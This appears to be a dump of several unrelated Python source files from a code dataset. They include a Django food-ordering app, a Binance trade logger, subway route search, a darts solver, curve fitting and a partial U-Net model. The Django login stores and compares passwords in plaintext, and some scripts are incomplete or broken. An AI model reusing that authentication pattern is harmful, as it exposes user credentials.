restro_phone=phone_no, password=password, \n email=email, address1 = address1, address2=address2, city=city, state=state, \n logo=url)\n user.save()\n return redirect('/Rlogin')\n # return render(request, 'example.html')\n else:\n return render(request, 'registerUser.html')\n\n\ndef Rlogin(request):\n if request.method == \"POST\":\n email = request.POST.get('email')\n password = request.POST.get('password')\n user = Restaurant.objects.get(email = email, password = password)\n # print(user)\n if user is not None:\n rId = user.RId\n # print(rId)\n # rId = Restaurant.objects.only('RId').get(email=email)\n request.session[\"rid_save\"] = rId\n\n getItems = Item.objects.filter(rId = rId)\n myorders = Order.objects.filter(rId = rId)\n print(myorders)\n itemidlist = []\n for i in myorders:\n x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName', 'Image')\n print(x)\n print(type(x))\n itemidlist.append(x)\n return render(request, 'example.html', {'items': getItems, 'orders': itemidlist})\n \n else:\n messages.info(request, 'Invalid Credentials 
!')\n return render(request, 'registerUser.html')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('project_app:restro')\n\n\ndef menu(request):\n return render(request, 'menu.html')\n\n\ndef addItem(request):\n if request.method == 'POST' and request.FILES['dish']:\n rid_save_item = None\n if \"rid_save\" in request.session:\n rid_save_item = request.session[\"rid_save\"]\n print(rid_save_item)\n r_id = Restaurant.objects.only(\"RId\").get(RId = rid_save_item)\n ItemName = request.POST.get('title')\n Description = request.POST.get('ingredients')\n price = request.POST.get('price')\n logo = request.FILES['dish']\n fs = FileSystemStorage()\n filename = fs.save(logo.name, logo)\n url = fs.url(filename)\n print(ItemName, Description, price, logo, url)\n saveitem = Item(rId = r_id, ItemName=ItemName, Description=Description, price=price,Image=url)\n saveitem.save()\n return redirect('/menu')\n else:\n messages.info(request, 'Invalid Method !')\n return redirect('/menu')\n\n\ndef showcart(request, rid):\n # if \"uid_save\" in request.session:\n # uid_save_item = request.session[\"uid_save\"]\n\n # u_id = Restaurant.objects.only(\"RId\").get(RId = rid_save_item)\n items = Item.objects.filter(rId = rid)\n # print(rid)\n # print(type(rid))\n request.session[\"rid_cart\"] = rid\n return render(request, 'cart4.html', {'items': items})\n\n\n# def set_cookie(request):\n# if \"rid_cart\" in request.session:\n# rid = request.session[\"rid_cart\"]\n# items = Item.objects.filter(rId = rid)\n# response = render(request, 'cart2.html', {'items': items})\n\ndef placeorder(request, item):\n print('in placeorder')\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"]\n\n if \"rid_cart\" in request.session:\n riD = request.session[\"rid_cart\"]\n\n if request.method == 'POST':\n quant = request.POST.get('quant')\n\n print('quant ',quant)\n uId = RestroUser.objects.only(\"id\").get(id= uid_save_item)\n rId = Restaurant.objects.only(\"RId\").get(RId = riD)\n itemId = Item.objects.only(\"ItemId\").get(ItemId = item)\n print(itemId.price)\n print(type(itemId.price))\n amount = (itemId.price)*int(quant)\n print('amt - ', amount)\n order = Order(uId = uId, rId = rId, itemId = itemId, quantity = quant, amount = amount)\n order.save()\n print(' order saved ')\n messages.info(request, \"Order places successfully\")\n # restrolist = Restaurant.objects.filter()\n items = Item.objects.filter(rId = rId)\n return render(request, 'cart4.html', {'items': items})\n\n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n email = request.POST.get('email')\n mess = request.POST.get('message')\n\n # send_mail('Contact Form', mess, settings.EMAIL_HOST_USER, [email id], fail_silently=False)\n\n return redirect('index')\n\n \ndef gohome(request):\n logout(request)\n return redirect('/')\n\n\ndef myorders(request):\n # ono = randint(100000, 999999)\n # request.session[\"ono_save\"] = ono\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"] \n # order_details = Order.objects.filter(uId = uid_save_item)\n # itemidlist = []\n # restrolist = []\n # total = 0\n # for i in order_details:\n # total += i.amount\n # x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName','price')\n # itemidlist.append(x)\n # y = Restaurant.objects.filter(RId = i.rId.RId).values('RestroName')\n # restrolist.append(y)\n\n # aftertax = total + (0.05*total)\n # delivery = aftertax + 5\n osummary = OrderSummary.objects.filter(uid = 
uid_save_item)\n osummary = osummary[len(osummary) - 1]\n print(osummary)\n jsonDec = json.decoder.JSONDecoder()\n itemidlist = []\n \n itemidlist.append(jsonDec.decode(osummary.itemslist))\n # itemidlist = jsonDec.decode(osummary.itemslist)\n print(itemidlist)\n # print(itemidlist[0])\n # print(itemidlist[0][0])\n # print(itemidlist)\n # itemdetails = []\n # qt = []\n # for i in itemidlist:\n # for j in i:\n # for k in j:\n # x = Item.objects.values_list('ItemName', 'price').get(ItemId = k['ItemId'])\n # print(x)\n # q = Order.objects.values_list('quantity').get(uId = uid_save_item, itemId = k['ItemId'])\n # print(q)\n # itemd = x + q\n # print(itemd)\n # print(type(itemd))\n # # x = Item.objects.filter(ItemId = k['ItemId']).values('ItemName','price')\n # # print(x)\n # # itemdetails.append(x)\n # # q = Order.objects.filter(uId = uid_save_item, itemId = k['ItemId']).values('quantity')\n # # qt.append(int(q))\n # # x.extra(\n # # select= {'qt': q}\n # # )\n # # print(x)\n # # x['qt'] = q\n # itemdetailes.append(itemd)\n\n restrodetails = []\n y = Restaurant.objects.values_list('RestroName').get(RId = osummary.rid.RId)\n restrodetails.append(y[0])\n qtlist = []\n for i in range(len(itemidlist)):\n print('i', i)\n for j in itemidlist[i]:\n print('j',j)\n print(type(j))\n print(j[0])\n x = Order.objects.values_list('quantity').get(itemId = j[0])\n # print('x' , x)\n x = list(x)\n qtlist.append(x)\n # print(itemidlist[i].index(j))\n # print(type(int(itemidlist[i].index(j))))\n # itemidlist[itemidlist[i].index(j)].append(x)\n print(itemidlist)\n print(qtlist)\n k = 0\n while k < len(qtlist):\n print('k',k)\n for i in itemidlist:\n for j in i:\n j.append(qtlist[k][0])\n k += 1\n\n print(itemidlist)\n # print(userdetails)\n # print(userdetails[0][0])\n # total = osummary[len(osummary) - 1].total \n # after_tax = osummary[len(osummary) - 1].aftertax\n total = osummary.total\n after_tax = osummary.aftertax\n return render(request, 'myorders2.html', {'order': osummary, 'restro': y[0], 'item':itemidlist, 'total':total, 'tax': after_tax})\n # return render(request, 'myorders.html', {'ono':ono,\n # 'order':order_details, 'item':itemidlist, \n # 'restro': restrolist ,'total':total,'tax':delivery})\n\n\ndef rorders(request):\n \n if \"rid_save\" in request.session:\n riD = request.session[\"rid_save\"]\n # jsonDec = json.decoder.JSONDecoder()\n # myPythonList = jsonDec.decode(myModel.myList)\n # order_details = Order.objects.filter(rId = riD)\n # itemidlist = []\n # userlist = []\n # total = 0\n\n # for i in order_details:\n # total += i.amount\n # x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemName','price')\n # itemidlist.append(x)\n # y = RestroUser.objects.filter(id = i.uId.id).values('address1', 'address2', 'city')\n # userlist.append(y)\n\n\n # aftertax = total + (0.05*total)\n # delivery = aftertax + 5\n\n osummary = OrderSummary.objects.filter(rid = riD)\n print(osummary)\n try:\n osummary = osummary[len(osummary) - 1]\n except:\n pass\n jsonDec = json.decoder.JSONDecoder()\n itemidlist = []\n itemidlist.append(jsonDec.decode(osummary.itemslist))\n # itemidlist = jsonDec.decode(osummary[0].itemslist)\n print(itemidlist)\n print(itemidlist[0])\n print(itemidlist[0][0])\n # print(itemidlist)\n itemdetails = []\n # for i in itemidlist:\n # for j in i:\n # for k in j:\n # x = Item.objects.filter(ItemId = k['ItemId']).values('ItemName','price')\n # itemdetails.append(x)\n\n userdetails = []\n y = RestroUser.objects.values_list('address1', 'address2', 'city').get(id = osummary.uid.id)\n 
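# note: each itemidlist entry is [ItemId, ItemName, price] (decoded from osummary.itemslist); the loop below appends each item's ordered quantity, assuming exactly one Order row per ItemId\n 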
# y = RestroUser.objects.get(id = i.uid.id).only('address1', 'address2', 'city')\n userdetails.append(y)\n print(userdetails)\n print(userdetails[0][0])\n\n qtlist = []\n for i in range(len(itemidlist)):\n print('i', i)\n for j in itemidlist[i]:\n print('j',j)\n print(type(j))\n print(j[0])\n x = Order.objects.values_list('quantity').get(itemId = j[0])\n # print('x' , x)\n x = list(x)\n qtlist.append(x)\n # print(itemidlist[i].index(j))\n # print(type(int(itemidlist[i].index(j))))\n # itemidlist[itemidlist[i].index(j)].append(x)\n print(itemidlist)\n print(qtlist)\n k = 0\n while k < len(qtlist):\n print('k',k)\n for i in itemidlist:\n for j in i:\n j.append(qtlist[k][0])\n k += 1\n\n print(itemidlist)\n\n\n total = osummary.total\n after_tax = osummary.aftertax\n return render(request, 'rorders.html', {'order': osummary, 'item':itemidlist, 'address': {'1': userdetails[0][0], '2': userdetails[0][1], '3':userdetails[0][2] }, 'total':total, 'aftertax': after_tax})\n # return render(request, 'rorders.html', {'ono':ono,'order':order_details, 'item':itemidlist, 'address': userlist,'total':total,'tax':delivery})\n\n\ndef update_status(request, oid):\n x = OrderSummary.objects.filter(osid = oid)\n if request.method == 'POST':\n st = request.POST.get('status')\n \n for i in x:\n i.status = st\n i.save()\n return redirect('/')\n\n\n# def order_summary(request):\n# ono = randint(100000, 999999)\n# if \"uid_save\" in request.session:\n# uid_save_item = request.session[\"uid_save\"]\n# d = datetime.date.today()\n# order_details = Order.objects.filter(uId = uid_save_item, odate = d)\n# # d = order_details[0].date.date()\n# uid = order_details[0].uId\n# elif \"rid_save\" in request.session:\n# riD = request.session[\"rid_save\"]\n# order_details = Order.objects.filter(rId = riD)\n# d = order_details[0].date.date()\n# uid = order_details[0].uId\n \n# itemidlist = []\n# total = 0\n\n# for i in order_details:\n# total += i.amount\n# x = Item.objects.filter(ItemId = i.itemId.ItemId).values('ItemId','ItemName','price')\n# itemidlist.append(list(x))\n \n# # print(itemidlist)\n# # print(type(itemidlist[0]))\n# total = total + (0.05*total)\n# total += 5\n# itemlist = json.dumps(itemidlist)\n# osummary = OrderSummary(ono=ono, uid = uid, rid= order_details[0].rId, date= d, itemslist= itemlist, total=total)\n# osummary.save()\n# return redirect('/Ulogin')\n\n\ndef order_summary(request):\n ono = randint(100000, 999999)\n if \"uid_save\" in request.session:\n uid_save_item = request.session[\"uid_save\"]\n\n d = datetime.date.today()\n order_details = Order.objects.filter(uId = uid_save_item, odate = d)\n uid = order_details[0].uId\n \n itemidlist = []\n after_tax = 0.0\n total = 0\n for i in order_details:\n total += i.amount\n x = Item.objects.values_list('ItemId', 'ItemName', 'price').get(ItemId = i.itemId.ItemId)\n itemidlist.append(x)\n after_tax = total + (0.05*total) + 5\n itemlist = json.dumps(itemidlist)\n osummary = OrderSummary(date = d, ono = ono, uid=uid, rid=order_details[0].rId, \n itemslist= itemlist, total=total, aftertax=after_tax)\n osummary.save()\n return redirect('/Ulogin')\n else: \n messages.info(request, \"Order was not successful\")\n return redirect('user')\n","sub_path":"FoodOrder/project_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"442361809","text":"#script to instantiate the comments screen and save.\r\n#import libraries\r\nfrom PyQt5 import QtWidgets\r\nfrom ventana_guardar import Ui_Comentarios_Guardar\r\n#main class\r\nclass Guardar(QtWidgets.QMainWindow):\r\n def __init__(self,nombre):\r\n super().__init__()\r\n #get the ui\r\n self.ui = Ui_Comentarios_Guardar(nombre)\r\n #load it into this window\r\n self.ui.setupUi(self)\r\n\r\n\r\n","sub_path":"comentarios_guardar.py","file_name":"comentarios_guardar.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"320870211","text":"import sqlite3\r\nfrom binance.client import Client\r\nimport time\r\nimport matplotlib\r\nfrom matplotlib import cm\r\nimport matplotlib.pyplot as plt\r\nfrom binance.enums import *\r\nimport save_historical_data_Roibal\r\nfrom BinanceKeys import BinanceKey1\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pandas.io import sql\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\ndef store_historical_trades(symbol, num_entries = 500):\r\n\r\n\r\n \r\n trade_id =[]\r\n trade_price =[]\r\n trade_quantity =[]\r\n trade_timestamp =[]\r\n trade_maker_status =[]\r\n trade_best_match_status =[]\r\n \r\n \r\n\r\n\r\n try:\r\n\r\n con = sqlite3.connect(\"/Users/maarten/binance.db\")\r\n print('SQLite connection is open')\r\n\r\n 
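# NOTE (added sketch): the original code never builds df before the to_sql call below, so it would raise a NameError.\r\n # A minimal completion from the (still empty) lists above; the column names are assumptions, and actually fetching\r\n # the trades (e.g. via python-binance Client.get_historical_trades(symbol=symbol, limit=num_entries)) is left out.\r\n df = pd.DataFrame({'id': trade_id, 'price': trade_price, 'qty': trade_quantity, 'time': trade_timestamp, 'is_buyer_maker': trade_maker_status, 'is_best_match': trade_best_match_status})\r\n 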
print(\"欢迎找我分析股票\")\n file.close()\n","sub_path":"logicTestV3.py","file_name":"logicTestV3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8284318","text":"import json\nimport time\nfrom copy import deepcopy as c\nfrom Graph import Graph\nimport numpy as np\n\n\ndef ppp(input_start, input_end, input_alpha):\n graph = Graph(undirected=True)\n start = time.time()\n\n with open('trans.json', 'r', encoding='UTF-8') as json_file:\n trans_data = json.load(json_file)\n with open('edges_fix.json', 'r', encoding='UTF-8') as json_file:\n json_data = json.load(json_file)\n with open('line.json', 'r', encoding='UTF-8') as line_file:\n line_data = json.load(line_file)\n\n SeoulMetroLine_translist = {}\n\n for i in line_data:\n for j in line_data[i]:\n SeoulMetroLine_translist[j+i] = i\n # SeoulMetroLine_list2.append([j+i, i])\n\n def score_sub2(p_sub):\n cost2 = score_sub(p_sub)\n return cost2\n\n def score_sub(p_sub):\n cost = 0\n p_remaining = 1\n\n for i in range(len(p_sub)):\n\n p_i = 0.2 if p_sub[i] in trans_data[\"trans\"] else 0.5\n p_i = p_remaining * p_i\n p_remaining = p_remaining - p_i\n\n cost = cost + p_i * cal_path_weight(i, p_sub)\n return cost\n\n def cal_path_weight(idx, path):\n sum_path = 0\n for i in range(idx, len(path)-1):\n sum_path = sum_path + graph.get_cost(path[i], path[i+1])\n return sum_path\n\n def split(path):\n paths = []\n out_cost = 0\n sv = []\n for i in range(len(path)):\n sv.append(path[i])\n # if i in trans_data[\"trans\"] or i == in_end:\n if path[i] == in_end:\n out_cost = out_cost + score_sub2(sv)\n # paths.append(score_sub(sv))\n sv = []\n\n elif not SeoulMetroLine_translist[path[i]] == SeoulMetroLine_translist[path[i+1]]:\n out_cost = out_cost + score_sub2(sv)\n # paths.append(score_sub(sv))\n sv = []\n return out_cost\n\n\n count = 0\n newpaths2 = {}\n SeoulMetro = {}\n SeoulMetroLine = {}\n SeoulMetro_list = []\n SeoulMetroLine_list = []\n for i in json_data:\n # SeoulMetro[i] = {}\n if not i == \"Trans\":\n for j in json_data[i]:\n SeoulMetro_list.append([j[\"from\"]+i, j[\"to\"]+i, j[\"time\"]])\n SeoulMetro_list.append([j[\"to\"]+i, j[\"from\"]+i, j[\"time\"]])\n elif i == \"Trans\":\n for j in json_data[i]:\n SeoulMetro_list.append([j[\"from\"], j[\"to\"], j[\"time\"]])\n SeoulMetro_list.append([j[\"to\"], j[\"from\"], j[\"time\"]])\n\n\n for i in SeoulMetro_list:\n graph.insert(i[0], i[1], i[2])\n\n\n def find_all_paths(graph2, start, end, weight=0, path=[[], 0]):\n path[0], path[1] = path[0]+[start], path[1]+weight\n if start == end:\n return [path]\n paths = []\n for node, w in graph2[start].items():\n if node not in path[0] and path[1]+w <= threshold:\n newpaths = find_all_paths(graph2, node, end, w, c(path))\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\n # print(find_all_paths(graph, 'A', 'D'))\n # print(find_shortest_path(graph.cost_matrix, in_start, in_end))\n in_start = input_start\n in_end = input_end\n dijkstra_result = np.load('Dijkstra_result.npy')\n dijkstra_dict = {}\n for r in dijkstra_result:\n dijkstra_dict[r[0]] = r[1]\n alpha = input_alpha\n threshold = float(dijkstra_dict[in_end]) * alpha\n output = find_all_paths(graph.cost_matrix, in_start, in_end)\n candidate_paths = []\n for p in output:\n # saved.append(split(p[0]))\n path_cost = split(p[0])\n # p.append([(pow(p[1], -1)) * path_cost])\n p.append(path_cost)\n candidate_paths.append(p)\n\n candidate_paths2 = sorted(candidate_paths, key=lambda cp: cp[2])\n\n 
for i in candidate_paths2:\n print(i)\n\n print('Count:', len(output))\n print(\"time :\", time.time() - start)\n","sub_path":"findallpaths2.py","file_name":"findallpaths2.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"431817183","text":"def discover_shortest_path(outstanding_score, path, shortest_path_length):\n\n # if score is reduced to 0, return full path\n if outstanding_score == 0:\n return [path]\n\n # if the path has been longer than the shortest path, abort it and return an empty list\n if len(path) > shortest_path_length:\n return []\n\n paths = []\n\n # try all possiblities of different scores\n for base_score in [50, 25, 3, 2, 1]:\n\n count = outstanding_score // base_score\n\n if count < 1:\n continue\n\n if base_score in [50, 25]: # when it's bull and outer\n count = min(1, count)\n description = \"bull\" if base_score == 50 else \"outer\"\n path.append({\"score\": base_score, \"name\": description})\n else:\n count = min(20, count)\n prefix = \"s\"\n if base_score == 3:\n prefix = \"t\"\n elif base_score == 2:\n prefix = \"d\"\n path.append({\"score\": base_score * count, \"name\": prefix + str(count)})\n\n # process the next throw\n visited_paths = discover_shortest_path(\n outstanding_score - base_score * count,\n path,\n shortest_path_length,\n )\n print('visited_paths:{}'.format(visited_paths))\n\n for p in visited_paths:\n path_length = len(p)\n if 1 <= path_length <= shortest_path_length:\n # save the path if its length is no larger than shortest length\n paths.append(sorted(p, key=lambda x: x[\"score\"], reverse=True))\n # if find the new shortest length, use it for the next search\n if path_length < shortest_path_length:\n shortest_path_length = path_length\n\n path.pop()\n\n return paths\n\n\ndef find_min_throws(score):\n\n throws = discover_shortest_path(score, [], score)\n\n # get the combination with the least throws\n min_throw_count = min([len(t) for t in throws])\n min_throws = [t for t in throws if len(t) == min_throw_count]\n print('min_throws:{}'.format(min_throws))\n\n # sort throws by the highest score in each throw\n filtered_throws = min_throws\n for i in range(min_throw_count):\n max_score = max(t[i][\"score\"] for t in filtered_throws)\n filtered_throws = [t for t in filtered_throws if t[i][\"score\"] == max_score]\n\n response = [i[\"name\"] for i in filtered_throws[0]]\n return response\n\n\nif __name__ == \"__main__\":\n # print(find_min_throws(161))\n # print(find_min_throws(170))\n print(find_min_throws(148))\n","sub_path":"python/diff/darts.py","file_name":"darts.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161413588","text":"import sqlite3\r\nfrom binance.client import Client\r\nimport time\r\nimport matplotlib\r\nfrom matplotlib import cm\r\nimport matplotlib.pyplot as plt\r\nfrom binance.enums import *\r\nimport save_historical_data_Roibal\r\nfrom BinanceKeys import BinanceKey1\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom pandas.io import sql\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\ndef store_historical_trades(symbol, num_entries = 500):\r\n\r\n\r\n \r\n trade_id =[]\r\n trade_price =[]\r\n trade_quantity =[]\r\n trade_timestamp =[]\r\n trade_maker_status =[]\r\n trade_best_match_status =[]\r\n \r\n \r\n\r\n\r\n try:\r\n\r\n con = sqlite3.connect(\"/Users/maarten/binance.db\")\r\n print('SQLite connection is open')\r\n\r\n 
df.to_sql(\"historical_trades\", con, if_exists = 'append', index = False,)\r\n\r\n\r\n finally:\r\n con.close()\r\n print('SQLite connection is closed')\r\n\r\n return df\r\n \r\nclass Position:\r\n \"\"\"\r\n Position main class\r\n \"\"\"\r\n\r\n def __init__(self, number, entry_price, size, exit_price, stop_loss):\r\n self.number = number\r\n self.type_ = \"None\"\r\n self.entry_price = float(entry_price)\r\n self.size = float(size)\r\n self.exit_price = float(exit_price)\r\n self.stop_loss = float(stop_loss)\r\n\r\n def show(self):\r\n \"\"\"\r\n Print position info\r\n :return:\r\n \"\"\"\r\n print(\"No. {0}\".format(self.number))\r\n print(\"Type: {0}\".format(self.type_))\r\n print(\"Entry: {0}\".format(self.entry_price))\r\n print(\"Size: {0}\".format(self.size))\r\n print(\"Exit: {0}\".format(self.exit_price))\r\n print(\"Stop: {0}\\n\".format(self.stop_loss))\r\n\r\n def __str__(self):\r\n return \"{} {}x{}\".format(self.type_, self.size, self.entry_price)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"OrderManager/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299722974","text":"import os\nimport numpy as np\nimport scipy.optimize as opt\nimport scipy.interpolate as si\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport pickle\n\n# Data: http://www.computer-services.e.u-tokyo.ac.jp/p/cemano/research/DP/documents/coe-f-213.pdf?fbclid=IwAR2Q5JFemo8hNWF-rD7dZshJbz7a7CWFGiPJeUIHwa8iwlYqBmvfgeaZn8Q\nages = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\nability = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\nages = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\nability = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\nabil_fun = si.splrep(ages, ability)\n\ndef data_moments(vals):\n output = si.splev(vals, abil_fun)\n return output\n\ndef model_moments(x, a, b, c, d):\n y = - a * np.arctan(b * x + c) + d \n return y\n\ndef err_vec(params, *args):\n a, b, c, d = params\n vals, = args\n data_mms = data_moments(vals)\n model_mms = model_moments(vals, a, b, c, d)\n\n sumsq = ((model_mms - data_mms) ** 2).sum()\n return sumsq\n\ndef optimize(graph = False, update = False):\n # optimization Problem\n a = 0.5\n b = 0.5\n c = 0.5\n d = 0.5\n params_init = np.array([a,b,c,d])\n gmm_args = np.array([62, 63, 64, 65])\n\n results_GMM = opt.minimize(err_vec, params_init, args = gmm_args, method = 'L-BFGS-B')\n print(results_GMM)\n a,b,c,d = results_GMM.x\n\n if graph: \n # Graphing:\n ages = np.linspace(20, 100, 81)\n ages_full = np.linspace(20, 100, 81)\n ages_beg = np.linspace(20, 65, 46)\n print(ages_beg)\n ages_end = np.linspace(65, 100, 36)\n print(ages_end)\n result_beg = si.splev(ages_beg, abil_fun)\n result_end = model_moments(ages_end, a,b,c,d)\n plt.xlabel(r'Age $s$')\n plt.ylabel(r'Productivity Level $e_{j,s}$')\n plt.plot(ages_beg, result_beg, color = 'r', label = r'Interpolation')\n plt.legend(loc='upper right')\n\n plt.plot(ages_end, result_end, color = 'g', label = r'Extrapolation')\n plt.legend(loc='upper right')\n\n ages_data = np.array([22, 27, 32, 37, 42, 47, 52, 57, 62, 65])\n ability_data = np.array([0.646, 0.843, 0.999, 1.107, 1.165, 1.218, 1.233, 1.127, 0.820, 0.727])\n plt.scatter(ages_data, ability_data, color = 'b', label = r'Literature Values')\n plt.legend(loc='upper right')\n 
plt.grid(b=True, which='major', color='0.65', linestyle='-')\n plt.tight_layout(rect=(0, 0.03, 1, 1))\n plt.savefig(\"ability.png\")\n\n if update:\n #Update Ability Levels in our code: \n matrix = []\n for i in ages_full:\n line = [4 * i] * 7\n matrix.append(line)\n matrix = pd.DataFrame(matrix)\n print(matrix)\n pickle.dump(matrix, open('run_examples/ability.pkl', 'wb'))\n\noptimize(graph=True)","sub_path":"ogusa/calibration/ability_levels.py","file_name":"ability_levels.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547869119","text":"import bag as dice\nimport numpy as np\n\ndef bonus(score):\n bonus = (score // 2) - 5\n return(bonus)\n\n#{score:points}\ndnd = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:1, 10:2, 11:3,\n 12:4, 13:5, 14:6, 15:8, 16:10, 17:13, 18:16}\n#have to extropolate down to 3 for pathfinder, it stops at 7\npath = {3:-4, 4:-4, 5:-4, 6:-4, 7:-4, 8:-2, 9:-1, 10:0, 11:1,\n 12:2, 13:3, 14:5, 15:7, 16:10, 17:13, 18:17}\n\n#4th ed is not fun\nfourth_8 = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:1, 10:2, 11:3,\n 12:4, 13:5, 14:7, 15:9, 16:11, 17:14, 18:18}\nfourth = {3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:1,\n 12:2, 13:3, 14:5, 15:7, 16:9, 17:12, 18:16}\n\ndef points(game, score):\n if game == \"dnd\":\n return dnd.get(score)\n if game == \"path\":\n return path.get(score)\n if game == \"fourth\":\n return fourth.get(score)\n\ndef ability_scores(method, n=1):\n \"\"\"'2d6', '3d6' or '4d6', n sets of 6\n\n use method to generate n sorted sets of ability scores\"\"\"\n set_of_scores = []\n for i in range(n):\n ability_scores = []\n for i in range(6):\n ability_scores.append(dice.roll_ability(method))\n ability_scores.sort()\n #return ability_scores\n set_of_scores.append(ability_scores)\n## if n == 1:\n## set_of_scores = set_of_scores[0]\n return set_of_scores\n\ndef total_points(scores, game):\n \"\"\"list of 6 ability scores followed by 'dnd', 'path', or 'fourth'\n\n given a set of scores, and the game, generate a dict with the points\n and scores\"\"\"\n pt_buy = []\n for lists in scores:\n for score in lists:\n pt_buy.append(points(game,score))\n if game == 'fourth':\n pt_buy[0] = fourth_8.get(lists[0])\n## if game == \"fourth\":\n## temp = fourth_8.get(score[0])\n## pt_buy[0] = temp\n return {'scores':scores, 'points':sum(pt_buy)}\n\n","sub_path":"rpg/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533870554","text":"''' Analytics Engine '''\n\nimport os\nimport json\nimport logging\nimport logging.config\nimport time\n\nlogging.Formatter.converter = time.gmtime\n\n\ndef setup_logging(\n default_path='logging.json',\n default_level=logging.INFO,\n env_key='LOG_CFG'\n):\n \"\"\"Setup logging configuration\"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n path = \"None\"\n logger = logging.getLogger(__name__)\n logger.info('Logging initialized using config: ' + path)\n\nsetup_logging()\n","sub_path":"cycles/cyclometer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596164102","text":"import torch\nfrom torch 
import nn\nfrom torchvision.transforms import transforms\n\nclass DoubleConv(nn.Module):\n # The convolutional layer\n def __init__(self, in_ch, mid_ch, out_ch):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(mid_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, input):\n return self.conv(input)\n\nclass DoubleConvRes(nn.Module):\n # The convolutional layer\n def __init__(self, in_ch, mid_ch, out_ch):\n super(DoubleConvRes, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n \n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bn1 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bn2 = nn.BatchNorm2d(out_ch) \n\n def forward(self, input):\n out = self.conv1(input)\n residual = out\n out = self.conv2(out)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv3(out)\n out = self.bn2(out)\n \n out += residual\n out = self.relu(out)\n \n return out\n\n\nclass OutConv(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch = 1):\n super(OutConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(mid_ch, out_ch, kernel_size=1)\n )\n\n def forward(self, input):\n return self.conv(input)\n\nclass Weighted_block(nn.Module):\n # Weighted Block (Also can be consider as a Attention block)\n def __init__(self, ch):\n super(Weighted_block, self).__init__() \n self.channel_attention = nn.Sequential( \n nn.Conv2d(ch, ch, 1),\n # nn.BatchNorm2d(ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(ch, ch, 1),\n # nn.BatchNorm2d(ch),\n nn.Sigmoid()\n )\n\n def forward(self, input): \n attention = torch.nn.functional.adaptive_avg_pool2d(input, (1,1))\n attention = self.channel_attention(attention)\n output = input * attention\n\n return output\n\nclass CA_UNET(nn.Module):\n \n def __init__(self, in_ch=3, out_ch=1):\n super(CA_UNET, self).__init__()\n n1 = 64\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = DoubleConvRes(in_ch, filters[0], filters[0]) \n 